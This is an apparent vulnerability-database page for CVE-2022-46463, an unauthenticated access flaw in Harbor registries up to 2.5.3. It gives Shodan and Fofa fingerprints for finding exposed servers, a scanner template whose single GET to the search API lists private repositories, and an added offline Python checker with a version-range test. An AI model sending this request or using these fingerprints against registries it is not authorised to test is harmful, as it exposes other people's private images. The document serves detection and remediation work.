CVE-2022-46463: Harbor <=2.5.3 - Unauthorized Access

Date: 2025-09-01 | Affected software: Harbor | PoC: public

Vulnerability description

An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication.

Shodan: http.favicon.hash:657337228
Fofa: icon_hash="657337228"

PoC code [public]

id: CVE-2022-46463

info:
  name: Harbor <=2.5.3 - Unauthorized Access
  author: Arm!tage
  severity: high
  description: |
    An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication
    Shodan: http.favicon.hash:657337228
    Fofa: icon_hash="657337228"
  remediation: |
    Upgrade Harbor to a version higher than 2.5.3 to mitigate the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46463
    - https://github.com/Vad1mo
    - https://github.com/lanqingaa/123/blob/main/README.md
    - https://github.com/lanqingaa/123/tree/bb48caa844d88b0e41e69157f2a2734311abf02d
  tags: cve,cve2022,harbor,auth-bypass,exposure
  created: 2023/10/14

rules:
  r0:
    request:
      method: GET
      path: /api/v2.0/search?q=/
    expression: response.status == 200 && response.body.bcontains(b'repository_name') && response.body.bcontains(b'project_name')
expression: r0()
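The template above expresses the check as one request plus a boolean expression. The following Python helper is an added example (not part of the original template or of Harbor) that reimplements that expression offline, so an operator can run it against a saved response from their own registry, and adds a version-range check derived from the remediation line (affected: v1.x.x through 2.5.3). The names rule_matches, parse_version, is_affected_version and assess, the lower bound of 1.0.0, and the sample JSON body are all constructed for this example.

```python
"""Offline self-assessment helpers for the CVE-2022-46463 template.

Added example, not the template author's or Harbor's own code. It
re-implements the template's rule logic (status == 200 and both marker
strings present in the body) in plain Python and adds a version-range
check based on the affected range stated on the page (v1.x.x to 2.5.3).
The function names and the sample body below are constructed.
"""
import re
from typing import Optional, Tuple

MARKERS = (b"repository_name", b"project_name")
LAST_AFFECTED = (2, 5, 3)      # page remediation: upgrade to > 2.5.3
FIRST_AFFECTED = (1, 0, 0)     # assumption: "v1.X.X" read as 1.0.0 and up


def rule_matches(status: int, body: bytes) -> bool:
    """Equivalent of the template expression:
    response.status == 200 && body.bcontains(b'repository_name')
                           && body.bcontains(b'project_name')
    """
    return status == 200 and all(m in body for m in MARKERS)


def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn 'v2.5.3', '2.5.3-rc1' or '2.6' into a comparable 3-tuple.

    A leading v, pre-release suffixes (-...) and build metadata (+...)
    are ignored; missing components are treated as 0.
    """
    core = version.strip().lstrip("vV").split("-")[0].split("+")[0]
    parts = []
    for piece in core.split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    while len(parts) < 3:
        parts.append(0)
    return (parts[0], parts[1], parts[2])


def is_affected_version(version: str) -> bool:
    """True when the version lies in the affected range 1.0.0 .. 2.5.3."""
    return FIRST_AFFECTED <= parse_version(version) <= LAST_AFFECTED


def assess(status: int, body: bytes, version: Optional[str] = None) -> dict:
    """Combine the response check with an optional version check, the way
    an operator reviewing their own registry would read the two signals."""
    result = {
        "unauthenticated_search_exposed": rule_matches(status, body),
        "version_in_affected_range": (
            is_affected_version(version) if version else None
        ),
    }
    result["needs_attention"] = bool(
        result["unauthenticated_search_exposed"]
        or result["version_in_affected_range"]
    )
    return result


# Constructed sample body shaped like what the template looks for;
# not a capture from a real Harbor instance.
SAMPLE_BODY = (b'{"repository":[{"repository_name":"library/app",'
               b'"project_name":"library","pull_count":3}],"project":[]}')

if __name__ == "__main__":
    print(assess(200, SAMPLE_BODY, "v2.5.3"))
    print(assess(401, b'{"errors":[{"code":"UNAUTHORIZED"}]}', "2.6.0"))
```

A 401 on the search endpoint, or a version above 2.5.3, clears the corresponding flag; either signal alone sets needs_attention, since an exposed search response is the direct evidence the template relies on, while the version is only an indicator that the fix is absent.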
